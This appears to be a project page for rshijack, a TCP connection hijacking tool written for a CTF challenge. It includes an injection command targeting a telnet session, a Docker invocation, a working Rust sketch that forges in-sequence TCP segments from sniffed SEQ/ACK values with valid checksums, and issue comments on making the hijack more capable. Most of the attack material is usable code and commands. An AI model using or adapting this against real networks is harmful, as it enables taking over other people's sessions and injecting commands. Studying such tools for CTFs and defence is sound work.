tcp connection hijacker, rust rewrite of shijack

Overview

rshijack

tcp connection hijacker, rust rewrite of shijack from 2001.

This was written for TAMUctf 2018, brick house 100. The target was a telnet server that was protected by 2FA. Since the challenge wasn't authenticated, there were multiple solutions for it. Our solution (cyclopropenylidene) was to wait until the authentication was done, then inject a TCP packet into the already established telnet connection:

# if you don't know one of the ports use 0 to match any port
echo 'cat ~/.ctf_flag' | sudo rshijack tap0 172.16.13.20:37386 172.16.13.19:23

After some attempts this command was accepted and executed by the telnet server, resulting in a TCP packet containing the flag.

screenshot

The way this works is by sniffing for a packet of the specific connection and reading its SEQ and ACK fields. Using that information, it's possible to build a segment on a raw socket with the same addresses and ports, the next expected sequence number, and a valid checksum, which the remote server accepts as part of the connection. Note that after the injection the server's expected sequence number has moved on, so the legitimate client's next segment is out of sequence: the real connection is desynchronized, which is expected for this kind of hijack.
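As an added illustration of that step (example code written for this page, not rshijack's own implementation), the following dependency-free Rust sketch parses a sniffed segment, applies the "port 0 matches any port" filter from the command above, and forges the next in-sequence segment with a valid TCP checksum. The addresses and ports are the ones from the CTF command; the sniffed segment is constructed in the example rather than captured, and putting the result on the wire through a raw socket (which needs CAP_NET_RAW) is left out.

```rust
use std::net::Ipv4Addr;

pub const FIN: u8 = 0x01;
pub const SYN: u8 = 0x02;
pub const PSH: u8 = 0x08;
pub const ACK: u8 = 0x10;

/// Fields we need from a sniffed TCP segment (the bytes after the IPv4 header).
#[derive(Debug, Clone, Copy, PartialEq, Eq)]
pub struct TcpHeader {
    pub src_port: u16,
    pub dst_port: u16,
    pub seq: u32,
    pub ack: u32,
    pub flags: u8,
    pub window: u16,
}

fn be16(b: &[u8], i: usize) -> u16 { u16::from_be_bytes([b[i], b[i + 1]]) }
fn be32(b: &[u8], i: usize) -> u32 { u32::from_be_bytes([b[i], b[i + 1], b[i + 2], b[i + 3]]) }

/// Parse a TCP segment into header and payload; None if it is truncated.
pub fn parse_tcp(seg: &[u8]) -> Option<(TcpHeader, &[u8])> {
    if seg.len() < 20 { return None; }
    let data_offset = ((seg[12] >> 4) as usize) * 4; // header length incl. options
    if data_offset < 20 || seg.len() < data_offset { return None; }
    let hdr = TcpHeader {
        src_port: be16(seg, 0), dst_port: be16(seg, 2),
        seq: be32(seg, 4), ack: be32(seg, 8),
        flags: seg[13], window: be16(seg, 14),
    };
    Some((hdr, &seg[data_offset..]))
}

/// Connection filter with the "0 matches any port" convention.
pub fn matches(hdr: &TcpHeader, src_port: u16, dst_port: u16) -> bool {
    (src_port == 0 || hdr.src_port == src_port) && (dst_port == 0 || hdr.dst_port == dst_port)
}

/// One's-complement sum of 16-bit words; an odd trailing byte is zero-padded.
fn ones_sum(mut acc: u32, bytes: &[u8]) -> u32 {
    for chunk in bytes.chunks(2) {
        let word = if chunk.len() == 2 { be16(chunk, 0) } else { (chunk[0] as u16) << 8 };
        acc += word as u32;
    }
    acc
}

/// TCP checksum over the IPv4 pseudo-header plus the segment (RFC 793).
/// Run over a segment whose checksum field is already correct it returns 0.
pub fn tcp_checksum(src: Ipv4Addr, dst: Ipv4Addr, seg: &[u8]) -> u16 {
    let mut pseudo = Vec::with_capacity(12);
    pseudo.extend_from_slice(&src.octets());
    pseudo.extend_from_slice(&dst.octets());
    pseudo.extend_from_slice(&[0, 6]); // zero byte, IPPROTO_TCP
    pseudo.extend_from_slice(&(seg.len() as u16).to_be_bytes());
    let mut sum = ones_sum(ones_sum(0, &pseudo), seg);
    while (sum >> 16) != 0 { sum = (sum & 0xffff) + (sum >> 16); }
    !(sum as u16)
}

/// Serialize a 20-byte TCP header (no options) plus payload with a valid checksum.
pub fn build_segment(src: Ipv4Addr, dst: Ipv4Addr, src_port: u16, dst_port: u16,
                     seq: u32, ack: u32, flags: u8, window: u16, data: &[u8]) -> Vec<u8> {
    let mut seg = Vec::with_capacity(20 + data.len());
    seg.extend_from_slice(&src_port.to_be_bytes());
    seg.extend_from_slice(&dst_port.to_be_bytes());
    seg.extend_from_slice(&seq.to_be_bytes());
    seg.extend_from_slice(&ack.to_be_bytes());
    seg.push(5 << 4); // data offset: 5 words
    seg.push(flags);
    seg.extend_from_slice(&window.to_be_bytes());
    seg.extend_from_slice(&[0, 0, 0, 0]); // checksum placeholder + urgent pointer
    seg.extend_from_slice(data);
    let csum = tcp_checksum(src, dst, &seg);
    seg[16..18].copy_from_slice(&csum.to_be_bytes());
    seg
}

/// The hijack step: given the last segment sniffed from the side we impersonate
/// (and its payload length), forge the segment that side would send next.
/// SEQ continues right after its last byte (a SYN or FIN consumes one number),
/// ACK repeats what it last acknowledged, so the peer accepts the data in-window.
pub fn forge_segment(src: Ipv4Addr, dst: Ipv4Addr, sniffed: &TcpHeader,
                     sniffed_payload_len: usize, data: &[u8]) -> Vec<u8> {
    let mut consumed = sniffed_payload_len as u32;
    if (sniffed.flags & (SYN | FIN)) != 0 { consumed += 1; }
    let seq = sniffed.seq.wrapping_add(consumed);
    build_segment(src, dst, sniffed.src_port, sniffed.dst_port, seq, sniffed.ack,
                  PSH | ACK, sniffed.window, data)
}

fn main() {
    // Constructed sample: the client 172.16.13.20:37386 has just sent "ls\r\n" to
    // the telnet server 172.16.13.19:23 at seq 1000, acknowledging 5000 from it.
    let (client, server) = (Ipv4Addr::new(172, 16, 13, 20), Ipv4Addr::new(172, 16, 13, 19));
    let sniffed = build_segment(client, server, 37386, 23, 1000, 5000, PSH | ACK, 29200, b"ls\r\n");
    let (hdr, payload) = parse_tcp(&sniffed).expect("valid segment");
    if matches(&hdr, 0, 23) {
        let forged = forge_segment(client, server, &hdr, payload.len(), b"cat ~/.ctf_flag\n");
        let (fh, _) = parse_tcp(&forged).unwrap();
        // `forged` would now go out through a raw socket inside an IPv4 packet from client to server.
        println!("inject seq={} ack={} ({} bytes)", fh.seq, fh.ack, forged.len());
    }
}
```

The forged segment reuses the sniffed source port, window and ACK and only advances SEQ by the bytes already sent, which is exactly the "read SEQ and ACK, then send" step described above; a real tool also has to keep advancing SEQ by the length of each injected payload if it sends more than one segment.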

The other tools in that screenshot are sniffglue and arpspoof.

Docker

If needed, rshijack can be pulled as a docker image. The image is currently about 10.2MB. `--net=host` is required so the container sees the host's network interface for sniffing and raw packet injection:

docker run -it --init --rm --net=host kpcyrd/rshijack eth0 172.16.13.20:37386 172.16.13.19:23

Notable mentions

License

GPLv3+

Comments
  • Pipe hijacked connection to stdout

    You currently need to sniff for replies manually; having rshijack sniff for replies and print them to stdout would be a major improvement.

    rshijack should feel like nc after the connection has been hijacked.

    To improve this further, we should consider sending ACK packets to keep the connection alive.

    opened by kpcyrd
  • Port wildcards

    Especially during development it was somewhat cumbersome to edit the src port for each connection. It might make sense to have some sort of wildcard syntax to match any connection to a specific service, but I'm not sure what's the best way to express this.

    opened by kpcyrd
  • Consider removing pcap dependency

    We currently depend on libpcap-dev to sniff seq/ack. It would be interesting to evaluate if it could be replaced with libpnet, which is already used in this project to send raw packets.

    opened by kpcyrd
  • Some improvements

    • The desync protection from the original shijack implementation has been added with -0
    • Sending a single packet was sufficient to solve the CTF level; this has been improved by reading data in a loop, with some log lines from the original implementation
    • After EOF, a FIN packet is sent to the remote peer

    opened by kpcyrd
Releases: v0.4.0